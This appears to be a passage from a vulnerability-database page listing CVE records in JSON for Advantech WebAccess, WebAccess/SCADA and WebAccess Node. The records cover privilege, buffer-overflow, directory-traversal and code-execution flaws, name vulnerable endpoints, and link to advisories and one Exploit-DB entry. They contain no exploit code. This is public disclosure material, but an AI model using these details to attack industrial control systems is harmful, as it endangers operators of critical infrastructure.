] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-287" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "refsource": "BID", "url": "http://www.securityfocus.com/bid/100526" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2017-12698", "datePublished": "2017-08-30T18:00:00", "dateReserved": "2017-08-09T00:00:00", "dateUpdated": "2024-08-05T18:43:56.460Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-14828
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securitytracker.com/id/1041939 | vdb-entry, x_refsource_SECTRACK | |
https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01%2C | x_refsource_MISC | |
http://www.securityfocus.com/bid/105728 | vdb-entry, x_refsource_BID |
Vendor | Product | Version | |
---|---|---|---|
▼ | Advantech | Advantech WebAccess |
Version: WebAccess Versions 8.3.1 and prior |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T09:38:14.082Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "1041939", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1041939" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01%2C" }, { "name": "105728", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/105728" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "WebAccess Versions 8.3.1 and prior" } ] } ], "datePublic": "2018-10-23T00:00:00", "descriptions": [ { "lang": "en", "value": "Advantech WebAccess 8.3.1 and earlier has an improper privilege management vulnerability, which may allow an attacker to access those files and perform actions at a system administrator level." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-269", "description": "IMPROPER PRIVILEGE MANAGEMENT CWE-269", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-10-25T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "1041939", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1041939" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01%2C" }, { "name": "105728", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/105728" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "DATE_PUBLIC": "2018-10-23T00:00:00", "ID": "CVE-2018-14828", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "WebAccess Versions 8.3.1 and prior" } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess 8.3.1 and earlier has an improper privilege management vulnerability, which may allow an attacker to access those files and perform actions at a system administrator level." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "IMPROPER PRIVILEGE MANAGEMENT CWE-269" } ] } ] }, "references": { "reference_data": [ { "name": "1041939", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id/1041939" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01,", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01," }, { "name": "105728", "refsource": "BID", "url": "http://www.securityfocus.com/bid/105728" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2018-14828", "datePublished": "2018-10-23T20:00:00Z", "dateReserved": "2018-08-01T00:00:00", "dateUpdated": "2024-09-16T19:30:10.895Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-15704
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.tenable.com/security/research/tra-2018-33 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | Advantech | Advantech WebAccess |
Version: 8.3.2 and below |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T10:01:54.527Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.tenable.com/security/research/tra-2018-33" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "8.3.2 and below" } ] } ], "datePublic": "2018-10-18T00:00:00", "descriptions": [ { "lang": "en", "value": "Advantech WebAccess 8.3.2 and below is vulnerable to a stack buffer overflow vulnerability. A remote authenticated attacker could potentially exploit this vulnerability by sending a crafted HTTP request to broadweb/system/opcImg.asp." } ], "problemTypes": [ { "descriptions": [ { "description": "Stack buffer overflow", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2018-10-22T18:57:01", "orgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "shortName": "tenable" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.tenable.com/security/research/tra-2018-33" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "vulnreport@tenable.com", "DATE_PUBLIC": "2018-10-18T00:00:00", "ID": "CVE-2018-15704", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "8.3.2 and below" } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess 8.3.2 and below is vulnerable to a stack buffer overflow vulnerability. A remote authenticated attacker could potentially exploit this vulnerability by sending a crafted HTTP request to broadweb/system/opcImg.asp." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Stack buffer overflow" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.tenable.com/security/research/tra-2018-33", "refsource": "MISC", "url": "https://www.tenable.com/security/research/tra-2018-33" } ] } } } }, "cveMetadata": { "assignerOrgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "assignerShortName": "tenable", "cveId": "CVE-2018-15704", "datePublished": "2018-10-22T19:00:00Z", "dateReserved": "2018-08-22T00:00:00", "dateUpdated": "2024-09-16T19:15:55.882Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-16753
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/102424 | vdb-entry, x_refsource_BID | |
https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess |
Version: Advantech WebAccess |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T20:35:21.034Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "102424", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/102424" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Advantech WebAccess" } ] } ], "datePublic": "2018-01-05T00:00:00", "descriptions": [ { "lang": "en", "value": "An Improper Input Validation issue was discovered in Advantech WebAccess versions prior to 8.3. WebAccess allows some inputs that may cause the program to crash." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-20", "description": "CWE-20", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-01-06T10:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "102424", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/102424" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2017-16753", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "Advantech WebAccess" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An Improper Input Validation issue was discovered in Advantech WebAccess versions prior to 8.3. WebAccess allows some inputs that may cause the program to crash." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-20" } ] } ] }, "references": { "reference_data": [ { "name": "102424", "refsource": "BID", "url": "http://www.securityfocus.com/bid/102424" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2017-16753", "datePublished": "2018-01-05T08:00:00", "dateReserved": "2017-11-09T00:00:00", "dateUpdated": "2024-08-05T20:35:21.034Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-15705
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.exploit-db.com/exploits/45774/ | exploit, x_refsource_EXPLOIT-DB | |
https://www.tenable.com/security/research/tra-2018-35 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | Advantech | Advantech WebAccess |
Version: 8.3.1 and 8.3.2 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T10:01:54.461Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "45774", "tags": [ "exploit", "x_refsource_EXPLOIT-DB", "x_transferred" ], "url": "https://www.exploit-db.com/exploits/45774/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.tenable.com/security/research/tra-2018-35" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "8.3.1 and 8.3.2" } ] } ], "datePublic": "2018-10-31T00:00:00", "descriptions": [ { "lang": "en", "value": "WADashboard API in Advantech WebAccess 8.3.1 and 8.3.2 allows remote authenticated attackers to write or overwrite any file on the filesystem due to a directory traversal vulnerability in the writeFile API. An attacker can use this vulnerability to remotely execute arbitrary code." } ], "problemTypes": [ { "descriptions": [ { "description": "Directory Traversal", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2018-11-07T10:57:01", "orgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "shortName": "tenable" }, "references": [ { "name": "45774", "tags": [ "exploit", "x_refsource_EXPLOIT-DB" ], "url": "https://www.exploit-db.com/exploits/45774/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.tenable.com/security/research/tra-2018-35" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "vulnreport@tenable.com", "DATE_PUBLIC": "2018-10-31T00:00:00", "ID": "CVE-2018-15705", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "8.3.1 and 8.3.2" } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "WADashboard API in Advantech WebAccess 8.3.1 and 8.3.2 allows remote authenticated attackers to write or overwrite any file on the filesystem due to a directory traversal vulnerability in the writeFile API. An attacker can use this vulnerability to remotely execute arbitrary code." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Directory Traversal" } ] } ] }, "references": { "reference_data": [ { "name": "45774", "refsource": "EXPLOIT-DB", "url": "https://www.exploit-db.com/exploits/45774/" }, { "name": "https://www.tenable.com/security/research/tra-2018-35", "refsource": "MISC", "url": "https://www.tenable.com/security/research/tra-2018-35" } ] } } } }, "cveMetadata": { "assignerOrgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "assignerShortName": "tenable", "cveId": "CVE-2018-15705", "datePublished": "2018-10-31T22:00:00Z", "dateReserved": "2018-08-22T00:00:00", "dateUpdated": "2024-09-16T17:59:24.977Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-10993
Vulnerability from cvelistv5
Vendor | Product | Version | |
---|---|---|---|
▼ | WebAccess | WebAccess/SCADA |
Version: Versions 8.3.5 and prior |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T22:40:15.647Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-617/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-612/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-602/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-606/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-603/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-605/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-623/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-597/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-618/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-611/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-601/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-616/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-607/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-614/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-615/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-613/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-598/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess/SCADA", "vendor": "WebAccess", "versions": [ { "status": "affected", "version": "Versions 8.3.5 and prior" } ] } ], "datePublic": "2019-06-27T00:00:00", "descriptions": [ { "lang": "en", "value": "In WebAccess/SCADA Versions 8.3.5 and prior, multiple untrusted pointer dereference vulnerabilities may allow a remote attacker to execute arbitrary code." } ], "problemTypes": [ { "descriptions": [ { "description": "Other", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-07-02T16:06:10", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-617/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-612/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-602/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-606/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-603/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-605/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-623/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-597/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-618/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-611/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-601/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-616/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-607/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-614/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-615/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-613/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-598/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2019-10993", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess/SCADA", "version": { "version_data": [ { "version_value": "Versions 8.3.5 and prior" } ] } } ] }, "vendor_name": "WebAccess" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In WebAccess/SCADA Versions 8.3.5 and prior, multiple untrusted pointer dereference vulnerabilities may allow a remote attacker to execute arbitrary code." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Other" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05", "refsource": "MISC", "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-617/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-617/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-612/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-612/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-602/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-602/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-606/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-606/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-603/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-603/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-605/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-605/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-623/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-623/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-597/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-597/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-618/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-618/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-611/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-611/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-601/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-601/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-616/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-616/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-607/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-607/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-614/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-614/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-615/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-615/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-613/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-613/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-598/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-598/" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2019-10993", "datePublished": "2019-06-28T20:52:48", "dateReserved": "2019-04-08T00:00:00", "dateUpdated": "2024-08-04T22:40:15.647Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-12018
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.us-cert.gov/ics/advisories/icsa-20-128-01 | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-20-628/ | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess Node |
Version: WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T11:48:57.609Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-628/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess Node", "vendor": "n/a", "versions": [ { "status": "affected", "version": "WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0" } ] } ], "descriptions": [ { "lang": "en", "value": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. An out-of-bounds vulnerability exists that may allow access to unauthorized data." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-125", "description": "OUT-OF-BOUNDS READ CWE-125", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2020-05-08T20:06:12", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-628/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2020-12018", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess Node", "version": { "version_data": [ { "version_value": "WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. An out-of-bounds vulnerability exists that may allow access to unauthorized data." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "OUT-OF-BOUNDS READ CWE-125" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01", "refsource": "MISC", "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-20-628/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-628/" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2020-12018", "datePublished": "2020-05-08T11:51:50", "dateReserved": "2020-04-21T00:00:00", "dateUpdated": "2024-08-04T11:48:57.609Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-16202
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://us-cert.cisa.gov/ics/advisories/icsa-20-261-01 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | WebAccess Node |
Version: All versions prior to 9.0.1 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T13:37:54.193Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-261-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess Node", "vendor": "n/a", "versions": [ { "status": "affected", "version": "All versions prior to 9.0.1" } ] } ], "descriptions": [ { "lang": "en", "value": "WebAccess Node (All versions prior to 9.0.1) has incorrect permissions set for resources used by specific services, which may allow code execution with system privileges." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-732", "description": "INCORRECT PERMISSION ASSIGNMENT FOR CRITICAL RESOURCE CWE-732", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2020-09-22T14:28:36", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-261-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2020-16202", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess Node", "version": { "version_data": [ { "version_value": "All versions prior to 9.0.1" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "WebAccess Node (All versions prior to 9.0.1) has incorrect permissions set for resources used by specific services, which may allow code execution with system privileges." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "INCORRECT PERMISSION ASSIGNMENT FOR CRITICAL RESOURCE CWE-732" } ] } ] }, "references": { "reference_data": [ { "name": "https://us-cert.cisa.gov/ics/advisories/icsa-20-261-01", "refsource": "MISC", "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-261-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2020-16202", "datePublished": "2020-09-22T14:28:36", "dateReserved": "2020-07-31T00:00:00", "dateUpdated": "2024-08-04T13:37:54.193Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-17910
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-18-298-02 | x_refsource_MISC | |
http://www.securityfocus.com/bid/105736 | vdb-entry, x_refsource_BID | |
http://www.securitytracker.com/id/1041957 | vdb-entry, x_refsource_SECTRACK |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | WebAccess Versions 8.3.2 and prior. |
Version: WebAccess Versions 8.3.2 and prior. |
|
